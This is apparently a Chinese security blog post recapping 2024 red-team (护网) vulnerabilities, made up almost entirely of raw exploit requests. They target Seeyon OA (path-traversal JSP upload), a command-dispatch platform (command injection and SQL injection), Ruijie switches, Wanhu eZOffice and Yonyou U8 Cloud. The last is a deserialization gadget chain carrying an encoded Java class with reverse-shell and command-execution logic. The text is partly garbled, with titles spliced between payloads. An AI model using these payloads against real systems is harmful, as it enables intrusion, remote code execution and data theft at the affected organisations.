 POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1 1 Host: 2 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 3 Content-Type: multipart/form-data; boundary=skdHHhNHjhnUgerSexsksboundary 4 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML,  like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30) --skdHHhNHjhnUgerSexsksboundary  Content-Disposition: form-data; name="type"  --skdHHhNHjhnUgerSexsksboundary Content-Disposition: form-data; name="extensions" png--skdHHhNHjhnUgerSexsksboundary  Content-Disposition: form-data; name="applicationCategory"  --skdHHhNHjhnUgerSexsksboundary  Content-Disposition: form-data; name="destDirectory"  --skdHHhNHjhnUgerSexsksboundary  Content-Disposition: form-data; name="destFilename"  --skdHHhNHjhnUgerSexsksboundary  Content-Disposition: form-data; name="maxSize"  --skdHHhNHjhnUgerSexsksboundary  Content-Disposition: form-data; name="isEncrypt"  false  --skdHHhNHjhnUgerSexsksboundary  Content-Disposition: form-data; name="file1"; filename="1.png" 36 Content-Type: Content-Type: application/pdf  <% out.println("hello test");%> --skdHHhNHjhnUgerSexsksboundary--
护网行动2024漏洞复盘:这些0day漏洞为何让企业一夜崩盘?
 POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1 Host:  Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Content-type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506) method=uploadMenuIcon&fileid=id值&filename=testqqww.jsp
护网行动2024漏洞复盘:这些0day漏洞为何让企业一夜崩盘?
/seeyon/main/menuIcon/a123.jsp
护网行动2024漏洞复盘:这些0day漏洞为何让企业一夜崩盘?
十七、指挥调度平台invite_one_member存在远程命令执行漏洞
GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`id>1.txt`HTTP/1.1Host: {hostname}User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0Accepttext/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2Upgrade-Insecure-Requests: 1
 GET /api/client/audiobroadcast/1.txt HTTP/1.1 Host: {hostname} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101  Firefox/121.0 Accept text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=9d162ed31bcb785f6f5cb1fcc92dfff2 Upgrade-Insecure-Requests: 1
十八、指挥调度平台ajax_users存在SQL注入漏洞
 POST /app/ext/ajax_users.php HTTP/1.1 Host User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like  Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: application/x-www-form-urlencoded dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(123456),0x7e),NULL,NULL,NULL-- 
十九、锐捷 RG-NBS2026G-P交换机WEB 管理ping.htm未授权访问漏洞
/safety/ping.htm
二十、万户协同办公平台ezoffice DocumentEdit_unite.jsp SQL注入 漏洞
/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1
二十一、用友U8 Cloud MonitorServlet 存在反序列化漏洞
 POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1 Host: {hostname} Cmd: whoami Accept-Encoding: gzip User-AgentMozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like GeckoVersion/12.0.3 Safari/605.1.15 Content-Length16284
{{unquote("xacxedx00x05srx00x11java.util.HashSetxbaDx85x95x96xb8xb74x03x0 0x00xpwx0cx00x00x00x02? @x00x00x00x00x00x01srx004org.apache.commons.collections.keyvalue.TiedMapEntryx8 axadxd2x9b9xc1x1fxdbx02x00x02Lx00x03keytx00x12Ljava/lang/Object;Lx00x03m aptx00x0fLjava/util/Map;xptx00x03foosrx00*org.apache.commons.collections.map.LazyM apnxe5x94x82x9eyx10x94x03x00x01Lx00x07factorytx00,Lorg/apache/commons/colle ctions/Transformer;xpsrx00:org.apache.commons.collections.functors.ChainedTransformer0 xc7x97xecx28zx97x04x02x00x01[x00x0diTransformerstx00[Lorg/apache/commons/collections/Transformer;xpurx00[Lorg.apache.commons.collections.Transformer;xbdV*xf1xd84x18x99x02x00x00xpx00 x00x00x04srx00;org.apache.commons.collections.functors.ConstantTransformerXvx90x11 Ax02xb1x94x02x00x01Lx00x09iConstantqx00~x00x03xpvrx00 javax.script.ScriptEngineManagerx00x00x00x00x00x00x00x00x00x00x00xpsrx00:or g.apache.commons.collections.functors.InvokerTransformerx87xe8xffkx7b|xce8x02x00 x03[x00x05iArgstx00x13[Ljava/lang/Object;Lx00x0biMethodNametx00x12Ljava/lang/S tring; [x00x0biParamTypestx00x12[Ljava/lang/Class;xpurx00x13[Ljava.lang.Object;x90xceX x9fx10sx29lx02x00x00xpx00x00x00x00tx00x0bnewInstanceurx00x12[Ljava.lang.C lass;xabx16xd7xaexcbxcdZx99x02x00x00xpx00x00x00x00sqx00~x00x13uqx00~ x00x18x00x00x00x01tx00x02jstx00x0fgetEngineByNameuqx00~x00x1bx00x00x00x 01vrx00x10java.lang.Stringxa0xf0xa48z;xb3Bx02x00x00xpsqx00~x00x13uqx00~x0 0x18x00x00x00x01t45try x7bx0a  loadx28"nashorn:mozilla_compat.js"x29;x0ax7d catch x28ex29 x7bx7dx0afunction getUnsafex28x29x7bx0a  var theUnsafeMethod = java.lang.Class.forNamex28"sun.misc.Unsafe"x29.getDeclaredFieldx28"theUnsafe"x2 9;x0a  theUnsafeMethod.setAccessiblex28truex29; x0a  return theUnsafeMethod.getx28nullx29;x0ax7dx0afunction removeClassCachex28clazzx29x7bx0a  var unsafe = getUnsafex28x29;x0a  var clazzAnonymousClass = unsafe.defineAnonymousClassx28clazz,java.lang.Class.forNamex28"java.lang.Class"x29 .getResourceAsStreamx28"Class.class"x29.readAllBytesx28x29,nullx29;x0a  var reflectionDataField = clazzAnonymousClass.getDeclaredFieldx28"reflectionData"x29;x0a  unsafe.putObjectx28clazz,unsafe.objectFieldOffsetx28reflectionDataFieldx29,nullx29; x0ax7dx0afunction bypassReflectionFilterx28x29 x7bx0a  var reflectionClass;x0a  try x7bx0a    reflectionClass = java.lang.Class.forNamex28"jdk.internal.reflect.Reflection"x29;x0a  x7d catch x28errorx29 x7bx0a    reflectionClass = java.lang.Class.forNamex28"sun.reflect.Reflection"x29;x0a  x7dx0a  var unsafe = getUnsafex28x29;x0a  var classBuffer = reflectionClass.getResourceAsStreamx28"Reflection.class"x29.readAllBytesx28x29;x 0a  var reflectionAnonymousClass = unsafe.defineAnonymousClassx28reflectionClass, classBuffer, nullx29;x0a  var fieldFilterMapField = reflectionAnonymousClass.getDeclaredFieldx28"fieldFilterMap"x29;x0a  var methodFilterMapField = reflectionAnonymousClass.getDeclaredFieldx28"methodFilterMap"x29;x0a  if x28fieldFilterMapField.getTypex28x29.isAssignableFromx28java.lang.Class.forNamex28 "java.util.HashMap"x29x29x29 x7bx0a    unsafe.putObjectx28reflectionClass, unsafe.staticFieldOffsetx28fieldFilterMapFieldx29, java.lang.Class.forNamex28"java.util.HashMap"x29.getConstructorx28x29.newInstance x28x29x29;x0a  x7dx0a  if x28methodFilterMapField.getTypex28x29.isAssignableFromx28java.lang.Class.forNamex2 8"java.util.HashMap"x29x29x29 x7bx0a    unsafe.putObjectx28reflectionClass, unsafe.staticFieldOffsetx28methodFilterMapFieldx29, java.lang.Class.forNamex28"java.util.HashMap"x29.getConstructorx28x29.newInstance x28x29x29;x0a  x7dx0a  removeClassCachex28java.lang.Class.forNamex28"java.lang.Class"x29x29;x0ax7dx0a function setAccessiblex28accessibleObjectx29x7bx0a    var unsafe = getUnsafex28x29;x0a    var overrideField = java.lang.Class.forNamex28"java.lang.reflect.AccessibleObject"x29.getDeclaredField x28"override"x29;x0a    var offset = unsafe.objectFieldOffsetx28overrideFieldx29;x0a    unsafe.putBooleanx28accessibleObject, offset, truex29;x0ax7dx0afunction defineClassx28bytesx29x7bx0a  var clz = null;x0a  var version = java.lang.System.getPropertyx28"java.version"x29;x0a  var unsafe = getUnsafex28x29;x0a  var classLoader = new java.net.URLClassLoaderx28java.lang.reflect.Array.newInstancex28java.lang.Class.forNa mex28"java.net.URL"x29, 0x29x29;x0a  tryx7bx0a    if x28version.splitx28"."x29[0] >= 11x29 x7bx0a      bypassReflectionFilterx28x29;x0a    defineClassMethod = java.lang.Class.forNamex28"java.lang.ClassLoader"x29.getDeclaredMethodx28"defineC lass", java.lang.Class.forNamex28"[B"x29,java.lang.Integer.TYPE, java.lang.Integer.TYPEx29;x0a    setAccessiblex28defineClassMethodx29;x0a    // xe7xbbx95xe8xbfx87 setAccessible x0a    clz = defineClassMethod.invokex28classLoader, bytes, 0, bytes.lengthx29;x0a    x7delsex7bx0a      var protectionDomain = new java.security.ProtectionDomainx28new java.security.CodeSourcex28null, java.lang.reflect.Array.newInstancex28java.lang.Class.forNamex28"java.security.cert. Certificate"x29, 0x29x29, null, classLoader, []x29;x0a      clz = unsafe.defineClassx28null, bytes, 0, bytes.length, classLoader, protectionDomainx29;x0a    x7dx0a  x7dcatchx28errorx29x7bx0a    error.printStackTracex28x29;x0a  x7dfinallyx7bx0a    return clz;x0a  x7dx0ax7dx0afunction base64DecodeToBytex28strx29 x7bx0a  var bt;x0a  tryx7bx0a    bt = java.lang.Class.forNamex28"sun.misc.BASE64Decoder"x29.newInstancex28x29.decodeBuf ferx28strx29;x0a  x7dcatchx28ex29x7bx7dx0a  if x28bt == nullx29x7bx0a    tryx7bx0a      bt = java.lang.Class.forNamex28"java.util.Base64"x29.newInstancex28x29.getDecoderx28 x29.decodex28strx29;x0a    x7dcatchx28ex29x7bx7dx0a  x7dx0a  ifx28bt == nullx29x7bx0a    tryx7bx0a      bt = java.util.Base64.getDecoderx28x29.decodex28strx29;x0a    x7dcatchx28ex29x7bx7dx0a  x7dx0a  if x28bt == nullx29x7bx0a    bt = java.lang.Class.forNamex28"org.apache.commons.codec.binary.Base64"x29.newInstancex 28x29.decodex28strx29;x0a  x7dx0a  return bt;x0ax7dx0avar code="yv66vgAAADEBmgoAHgCtCgBDAK4KAEMArwoAHgCwCACxCgAcALIKALMAtAoAswC1BwC2CgBDALcIAKUK ACEAuAgAuQgAugcAuwgAvAgAvQcAvgoAHAC/CADACADBBwDCCwAWAMMLAMQAxQsAxADGCADHCADIBwDJCgAcAMo HAMsKAMwAzQgAzgcAzwgA0AoAjwDRCgAhANIIANMJANQA1QoA1ADWCADXCgCPANgKABwA2QgA2gcA2woAHADcCA DdBwDeCADfCADgCgAcAOEHAOIKAEMA4woA5ADYCADlCgAhAOYIAOcKACEA6AgA6QoAIQDqCgCPAOsIAOwKACEA7 QgA7gkAjwDvCgDUAPAJAI8A8QcA8goAQwDzCgBDAPQIAKYIAPUIAPYKAI8A9wgA+AoAjwD5BwD6CgBMAPsHAPwK AE4A/QoAjwD+CgBOAP8KAE4BAAoATgEBCgAvAQIKAEwBAwoAIQEECAEFCgEGAQcKACEBCAgBCQgBCggBCwcBDAo AXQCtCgBdAQ0IAQ4KAF0BAggBDwgBEAgBEQgBEgoBEwEUCgETARUHARYKARcBGAoAaAEZCAEaCgBoARsKAGgAxQ oAaAEcCgEXAR0KARcBHggBHwgBIAoBEwEhBwEiCgB0ASMKAHQBGAoBFwEkCgB0ASQKAHQBJQoBJgEnCgEmASgKA SkBKgoBKQEABQAAAAAAAAAyCgBDASsKARcBLAoAdAEBCAEtCgAvAS4IAS8IATAKANQBMQoAjwEyCAEzCAE0CAE1CAE2CACpCAE3BwE4AQAMQkFTRTY0X0NIQVJTAQASTGphdmEvbGFuZy9TdHJpbmc7AQANQ29uc3RhbnRWYWx1ZQg BOQEAAmlwAQAEcG9ydAEAE0xqYXZhL2xhbmcvSW50ZWdlcjsBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU 51bWJlclRhYmxlAQAKRXhjZXB0aW9ucwEACWxvYWRDbGFzcwEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvb GFuZy9DbGFzczsBAAlTaWduYXR1cmUBACgoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M8Kj47 AQAFcHJveHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEABXdyaXRlAQA4KExqYXZ hL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAApjbGVhclBhcmFtAQ AEZXhlYwEAB3JldmVyc2UBACcoTGphdmEvbGFuZy9TdHJpbmc7SSlMamF2YS9sYW5nL1N0cmluZzsBAANydW4BA AZkZWNvZGUBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQAKU291cmNlRmlsZQEAB0E0LmphdmEMAJcAmAwBOgE7 DAE8AT0MAT4BPwEAB3RocmVhZHMMAUABQQcBQgwBQwFEDAFFAUYBABNbTGphdmEvbGFuZy9UaHJlYWQ7DAFHAUg MAUkBSgEABGh0dHABAAZ0YXJnZXQBABJqYXZhL2xhbmcvUnVubmFibGUBAAZ0aGlzJDABAAdoYW5kbGVyAQAeam F2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDAFLAT8BAAZnbG9iYWwBAApwcm9jZXNzb3JzAQAOamF2YS91d GlsL0xpc3QMAUwBTQcBTgwBTwFQDAFRAVIBAANyZXEBAAtnZXRSZXNwb25zZQEAD2phdmEvbGFuZy9DbGFzcwwB UwFUAQAQamF2YS9sYW5nL09iamVjdAcBVQwBVgFXAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAA2N tZAwAoAChDAFYAVkBAAlzZXRTdGF0dXMHAVoMAVsBXAwBXQFeAQAkb3JnLmFwYWNoZS50b21jYXQudXRpbC5idW YuQnl0ZUNodW5rDACcAJ0MAV8BUgEACHNldEJ5dGVzAQACW0IMAWABVAEAB2RvV3JpdGUBABNqYXZhL2xhbmcvR XhjZXB0aW9uAQATamF2YS5uaW8uQnl0ZUJ1ZmZlcgEABHdyYXAMAWEAnQEAIGphdmEvbGFuZy9DbGFzc05vdEZv dW5kRXhjZXB0aW9uDAFiAWMHAWQBAAAMAWUBZgEAEGNvbW1hbmQgbm90IG51bGwMAWcBSAEABSMjIyMjDAFoAWk MAKQAoQEAAToMAWoBawEAImNvbW1hbmQgcmV2ZXJzZSBob3N0IGZvcm1hdCBlcnJvciEMAJQAkQwBbAFtDACVAJ YBABBqYXZhL2xhbmcvVGhyZWFkDACXAW4MAW8AmAEABSQkJCQkAQASZmlsZSBmb3JtYXQgZXJyb3IhDACiAKMBA AVAQEBAQAwApQChAQAMamF2YS9pby9GaWxlDACXAXABABhqYXZhL2lvL0ZpbGVPdXRwdXRTdHJlYW0MAJcBcQwA qQCqDACiAXIMAXMAmAwBdACYDAF1AUgMAXYBSAwBdwF4AQAHb3MubmFtZQcBeQwBegChDAF7AUgBAAN3aW4BAAR waW5nAQACLW4BABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgwBfAF9AQAFIC1uIDQBAAIvYwEABSAtdCA0AQACc2 gBAAItYwcBfgwBfwGADAClAYEBABFqYXZhL3V0aWwvU2Nhbm5lcgcBggwBgwGEDACXAYUBAAJcYQwBhgGHDAFRA UgMAYgBhAwBiQCYAQAHL2Jpbi9zaAEAB2NtZC5leGUMAKUBigEAD2phdmEvbmV0L1NvY2tldAwAlwGLDAGMAY0M AY4BUAcBjwwBkAGRDAGSAZEHAZMMAKIBlAwBlQGWDAGXAZEBAB1yZXZlcnNlIGV4ZWN1dGUgZXJyb3IsIG1zZyA tPgwBmAFIAQABIQEAE3JldmVyc2UgZXhlY3V0ZSBvayEMAZkBkQwApgCnAQAWc3VuLm1pc2MuQkFTRTY0RGVjb2 RlcgEADGRlY29kZUJ1ZmZlcgEAEGphdmEudXRpbC5CYXNlNjQBAApnZXREZWNvZGVyAQAmb3JnLmFwYWNoZS5jb 21tb25zLmNvZGVjLmJpbmFyeS5CYXNlNjQBAAJBNAEAQEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVm Z2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8BAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1R ocmVhZDsBAA5nZXRUaHJlYWRHcm91cAEAGSgpTGphdmEvbGFuZy9UaHJlYWRHcm91cDsBAAhnZXRDbGFzcwEAEy gpTGphdmEvbGFuZy9DbGFzczsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2Y S9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBAA1zZXRBY2Nlc3NpYmxlAQAE KFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAHZ2V0TmFtZQEAFCg pTGphdmEvbGFuZy9TdHJpbmc7AQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAA1nZX RTdXBlcmNsYXNzAQAIaXRlcmF0b3IBABYoKUxqYXZhL3V0aWwvSXRlcmF0b3I7AQASamF2YS91dGlsL0l0ZXJhd G9yAQAHaGFzTmV4dAEAAygpWgEABG5leHQBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldE1ldGhvZAEAQChM amF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABh qYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbm cvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAhnZXRCeXRlcwEABCgpW0IBABFqYXZhL2xhbmcvSW50ZWdlc gEABFRZUEUBABFMamF2YS9sYW5nL0NsYXNzOwEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7AQAL bmV3SW5zdGFuY2UBABFnZXREZWNsYXJlZE1ldGhvZAEAB2Zvck5hbWUBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXI BABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAGZXF1YWxzAQAVKE xqYXZhL2xhbmcvT2JqZWN0OylaAQAEdHJpbQEACnN0YXJ0c1dpdGgBABUoTGphdmEvbGFuZy9TdHJpbmc7KVoBA AVzcGxpdAEAJyhMamF2YS9sYW5nL1N0cmluZzspW0xqYXZhL2xhbmcvU3RyaW5nOwEACHBhcnNlSW50AQAVKExq YXZhL2xhbmcvU3RyaW5nOylJAQAXKExqYXZhL2xhbmcvUnVubmFibGU7KVYBAAVzdGFydAEAFShMamF2YS9sYW5 nL1N0cmluZzspVgEAEShMamF2YS9pby9GaWxlOylWAQAFKFtCKVYBAAVmbHVzaAEABWNsb3NlAQAIdG9TdHJpbm cBAA9nZXRBYnNvbHV0ZVBhdGgBAAdyZXBsYWNlAQBEKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlO0xqYXZhL2xhb mcvQ2hhclNlcXVlbmNlOylMamF2YS9sYW5nL1N0cmluZzsBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVy dHkBAAt0b0xvd2VyQ2FzZQEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmd CdWlsZGVyOwEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOw EAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEAD mdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07 KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAA5nZXR FcnJvclN0cmVhbQEAB2Rlc3Ryb3kBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAB YoTGphdmEvbGFuZy9TdHJpbmc7SSlWAQAPZ2V0T3V0cHV0U3RyZWFtAQAYKClMamF2YS9pby9PdXRwdXRTdHJlY W07AQAIaXNDbG9zZWQBABNqYXZhL2lvL0lucHV0U3RyZWFtAQAJYXZhaWxhYmxlAQADKClJAQAEcmVhZAEAFGph dmEvaW8vT3V0cHV0U3RyZWFtAQAEKEkpVgEABXNsZWVwAQAEKEopVgEACWV4aXRWYWx1ZQEACmdldE1lc3NhZ2U BAAhpbnRWYWx1ZQAhAI8AHgABAA8AAwAaAJAAkQABAJIAAAACAJMAAgCUAJEAAAACAJUAlgAAAAkAAQCXAJgAAgCZAAADtgAGABMAAAKOKrcAAbgAArYAA0wrtgAEEgW2AAZNLAS2AAcsK7YACMAACcAACU4tOgQZBL42BQM2BhUGF QWiAlgZBBUGMjoHGQfHAAanAkMZB7YACjoIGQgSC7YADJoADRkIEg22AAyaAAanAiUZB7YABBIOtgAGTSwEtgAH LBkHtgAIOgkZCcEAD5oABqcCAhkJtgAEEhC2AAZNLAS2AAcsGQm2AAg6CRkJtgAEEhG2AAZNpwAWOgoZCbYABLY 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 nAAYSck64AGYttgBzOgS7AHRZKxy3AHU6BRkEtgBpOgYZBLYAbzoHGQW2AHY6CBkEtgB3OgkZBbYAeDoKGQW2AH maAGAZBrYAep4AEBkKGQa2AHu2AHyn/+4ZB7YAep4AEBkKGQe2AHu2AHyn/+4ZCLYAep4AEBkJGQi2AHu2AHyn/ +4ZCrYAfRkJtgB9FAB+uACAGQS2AIFXpwAIOgun/54ZBLYAcBkFtgCCpwAgTrsAXVm3AF4Sg7YAXy22AIS2AF8S hbYAX7YAYbAShrAAAgCnAK0AsAAvAAAAvwDCAC8AAQCaAAAAbgAbAAAA0QAQANIAFgDUABkA1gAiANcALQDYAEI A2QBQANoAWADbAGAA3ABtAN4AdQDfAIIA4QCKAOIAlwDkAJwA5QChAOYApwDoAK0A6QCwAOoAsgDrALUA7QC6AO 4AvwDxAMIA7wDDAPAA3wDyAAEAqACYAAEAmQAAAC0AAwABAAAAESoqtABAKrQAQrYAh7YAiFexAAAAAQCaAAAAC gACAAAA9wAQAPgACQCpAKoAAQCZAAABHAAGAAQAAACsAUwSibgAMk0sEooEvQAcWQMSIVO2AB0stgAqBL0AHlkD KlO2AB/AACzAACxMpwAETSvHAEMSi7gAMhKMA70AHLYAHQEDvQAetgAfTSy2AAQSjQS9ABxZAxIhU7YAHSwEvQA eWQMqU7YAH8AALMAALEynAARNK8cANBKOuAAyTSwSjQS9ABxZAxIhU7YAHU4tLLYAKgS9AB5ZAypTtgAfwAAswA AsTKcABE0rsAADAAIALQAwAC8ANQBxAHQALwB5AKYAqQAvAAEAmgAAAEYAEQAAAQAAAgECAAgBAwAtAQYAMAEEA DEBBwA1AQkATAEKAHEBDQB0AQsAdQEPAHkBEQB/ARIAjwETAKYBFgCpARQAqgEYAAEAqwAAAAIArA==";x0ac lz = defineClassx28base64DecodeToBytex28codex29x29;clz.newInstancex28x29;tx00x04eval uqx00~x00x1bx00x00x00x01qx00~x00#srx00x11java.util.HashMapx05x07xdaxc1x c3x16`xd1x03x00x02Fx00x0aloadFactorIx00x09thresholdxp? @x00x00x00x00x00x00wx08x00x00x00x10x00x00x00x00xxx")}}
    好了好了,兄弟们,实在是不想写下去了,熬不住了就算是ctrl+c ctrl+v也是很累了,其实我总结了还有很多,这些只是冰山一角,相关资料我已生成文档,回复关键字自己拿吧。
关注我后直接发送:东南安全24
没有空格我在后台看别的小伙伴回复的有点滑稽。
最后欢迎大家投稿补充并指正我可能出现的我问题。

原文始发于微信公众号(东南网络安全):护网行动2024漏洞复盘:这些0day漏洞为何让企业一夜崩盘?

